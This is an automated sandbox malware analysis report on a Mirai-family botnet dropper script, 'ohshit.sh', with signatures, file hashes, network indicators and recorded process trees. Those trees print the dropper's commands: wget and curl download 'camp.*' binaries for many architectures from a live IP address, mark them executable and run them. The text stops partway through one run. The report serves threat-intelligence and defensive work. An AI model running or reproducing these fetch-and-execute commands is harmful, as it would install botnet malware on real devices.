Malware Analysis Report

2024-11-13 17:44

Sample ID 241109-kfas4szqcx
Target ohshit.sh
SHA256 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed
Tags
mirai lzrd antivm botnet defense_evasion discovery upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed

Threat Level: Known bad

The file ohshit.sh was found to be: Known bad.

Malicious Activity Summary

mirai lzrd antivm botnet defense_evasion discovery upx

Mirai family

Mirai

File and Directory Permissions Modification

Executes dropped EXE

Modifies Watchdog functionality

Enumerates running processes

Writes file to system bin folder

UPX packed file

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 08:32

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

debian9-armhf-20240611-en

Max time kernel

139s

Max time network

153s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/4/status /tmp/Chaotic N/A
File opened for reading /proc/20/status /tmp/Chaotic N/A
File opened for reading /proc/462/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/1/status /tmp/Chaotic N/A
File opened for reading /proc/149/status /tmp/Chaotic N/A
File opened for reading /proc/27/status /tmp/Chaotic N/A
File opened for reading /proc/74/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/647/status /tmp/Chaotic N/A
File opened for reading /proc/648/status /tmp/Chaotic N/A
File opened for reading /proc/3/status /tmp/Chaotic N/A
File opened for reading /proc/401/status /tmp/Chaotic N/A
File opened for reading /proc/267/status /tmp/Chaotic N/A
File opened for reading /proc/605/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/302/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/18/status /tmp/Chaotic N/A
File opened for reading /proc/414/status /tmp/Chaotic N/A
File opened for reading /proc/74/status /tmp/Chaotic N/A
File opened for reading /proc/147/status /tmp/Chaotic N/A
File opened for reading /proc/831/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/28/status /tmp/Chaotic N/A
File opened for reading /proc/265/status /tmp/Chaotic N/A
File opened for reading /proc/308/status /tmp/Chaotic N/A
File opened for reading /proc/95/status /tmp/Chaotic N/A
File opened for reading /proc/2/status /tmp/Chaotic N/A
File opened for reading /proc/6/status /tmp/Chaotic N/A
File opened for reading /proc/305/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/5/status /tmp/Chaotic N/A
File opened for reading /proc/21/status /tmp/Chaotic N/A
File opened for reading /proc/self/exe /tmp/Chaotic N/A
File opened for reading /proc/19/status /tmp/Chaotic N/A
File opened for reading /proc/43/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/776/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/318/status /tmp/Chaotic N/A
File opened for reading /proc/166/status /tmp/Chaotic N/A
File opened for reading /proc/305/status /tmp/Chaotic N/A
File opened for reading /proc/28/status /tmp/Chaotic N/A
File opened for reading /proc/17/status /tmp/Chaotic N/A
File opened for reading /proc/749/status /tmp/Chaotic N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/13/status /tmp/Chaotic N/A
File opened for reading /proc/414/status /tmp/Chaotic N/A
File opened for reading /proc/641/status /tmp/Chaotic N/A
File opened for reading /proc/10/status /tmp/Chaotic N/A
File opened for reading /proc/12/status /tmp/Chaotic N/A
File opened for reading /proc/21/status /tmp/Chaotic N/A
File opened for reading /proc/605/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/685/status /tmp/Chaotic N/A
File opened for reading /proc/22/status /tmp/Chaotic N/A
File opened for reading /proc/107/status /tmp/Chaotic N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/cat

[cat camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/cat

[cat camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/cat

[cat camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/cat

[cat camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/cat

[cat camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/cat

[cat camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-YuhGQG]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/cat

[cat camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/cat

[cat camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/cat

[cat camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/cat

[cat camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/cat

[cat camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/cat

[cat camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/cat

[cat camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp

Files

/tmp/busybox

MD5 e588bcf03ae78237b58899d35f50c570
SHA1 2194732ebbefbc27bdae876c77f2a97a20175710
SHA256 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

/tmp/camp.arc

MD5 36a7a1e959eaf7d6896505777912ecdf
SHA1 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919
SHA256 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca
SHA512 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0

/tmp/Chaotic

MD5 dac9f1dcafdb77db0d0ff1be1e704b1e
SHA1 e83605a050e0aaad3dba360545a00036f083eb91
SHA256 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d
SHA512 e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571

/tmp/Chaotic

MD5 62e0ec59f989335be5fbf630a49da4ea
SHA1 43bdde1afd1089008539973b08e35dd66fb7451a
SHA256 c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15
SHA512 ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95

/tmp/Chaotic

MD5 4c64afb0ad73da68d0e9dc8894d97f3a
SHA1 0d3f5938508079bf9dbbe13d75d7b91e21845312
SHA256 de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b
SHA512 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107

/tmp/Chaotic

MD5 adfc93deaed5f946d896d185a7a3672f
SHA1 30686df1ec33ec8941a6bd5471292ec4dfdc7522
SHA256 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd
SHA512 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f

/tmp/Chaotic

MD5 69e35fed3302be73c0de271eae2690f7
SHA1 fdfb172bdcefc5f97d642c56e3771deffa0341c6
SHA256 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981
SHA512 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2

memory/773-1-0x00008000-0x00025990-memory.dmp

memory/816-2-0x00008000-0x0001a904-memory.dmp

memory/821-3-0x00008000-0x0002fc28-memory.dmp

memory/828-4-0x00008000-0x000236c8-memory.dmp

memory/840-5-0xb6763000-0xb6774044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

debian9-mipsbe-20240729-en

Max time kernel

145s

Max time network

146s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/4/status /tmp/Chaotic N/A
File opened for reading /proc/9/status /tmp/Chaotic N/A
File opened for reading /proc/16/status /tmp/Chaotic N/A
File opened for reading /proc/327/status /tmp/Chaotic N/A
File opened for reading /proc/379/status /tmp/Chaotic N/A
File opened for reading /proc/678/status /tmp/Chaotic N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/2/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/78/status /tmp/Chaotic N/A
File opened for reading /proc/161/status /tmp/Chaotic N/A
File opened for reading /proc/356/status /tmp/Chaotic N/A
File opened for reading /proc/386/status /tmp/Chaotic N/A
File opened for reading /proc/8/status /tmp/Chaotic N/A
File opened for reading /proc/74/status /tmp/Chaotic N/A
File opened for reading /proc/84/status /tmp/Chaotic N/A
File opened for reading /proc/176/status /tmp/Chaotic N/A
File opened for reading /proc/715/status /tmp/Chaotic N/A
File opened for reading /proc/722/status /tmp/Chaotic N/A
File opened for reading /proc/811/status /tmp/Chaotic N/A
File opened for reading /proc/23/status /tmp/Chaotic N/A
File opened for reading /proc/71/status /tmp/Chaotic N/A
File opened for reading /proc/5/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/3/status /tmp/Chaotic N/A
File opened for reading /proc/70/status /tmp/Chaotic N/A
File opened for reading /proc/72/status /tmp/Chaotic N/A
File opened for reading /proc/77/status /tmp/Chaotic N/A
File opened for reading /proc/717/status /tmp/Chaotic N/A
File opened for reading /proc/12/status /tmp/Chaotic N/A
File opened for reading /proc/37/status /tmp/Chaotic N/A
File opened for reading /proc/36/status /tmp/Chaotic N/A
File opened for reading /proc/673/status /tmp/Chaotic N/A
File opened for reading /proc/707/status /tmp/Chaotic N/A
File opened for reading /proc/714/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/7/status /tmp/Chaotic N/A
File opened for reading /proc/10/status /tmp/Chaotic N/A
File opened for reading /proc/353/status /tmp/Chaotic N/A
File opened for reading /proc/712/status /tmp/Chaotic N/A
File opened for reading /proc/819/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/19/status /tmp/Chaotic N/A
File opened for reading /proc/22/status /tmp/Chaotic N/A
File opened for reading /proc/122/status /tmp/Chaotic N/A
File opened for reading /proc/155/status /tmp/Chaotic N/A
File opened for reading /proc/240/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/73/status /tmp/Chaotic N/A
File opened for reading /proc/83/status /tmp/Chaotic N/A
File opened for reading /proc/6/status /tmp/Chaotic N/A
File opened for reading /proc/14/status /tmp/Chaotic N/A
File opened for reading /proc/354/status /tmp/Chaotic N/A
File opened for reading /proc/798/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/75/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/17/status /tmp/Chaotic N/A
File opened for reading /proc/20/status /tmp/Chaotic N/A
File opened for reading /proc/675/status /tmp/Chaotic N/A
File opened for reading /proc/81/status /tmp/Chaotic N/A
File opened for reading /proc/121/status /tmp/Chaotic N/A
File opened for reading /proc/24/status /tmp/Chaotic N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

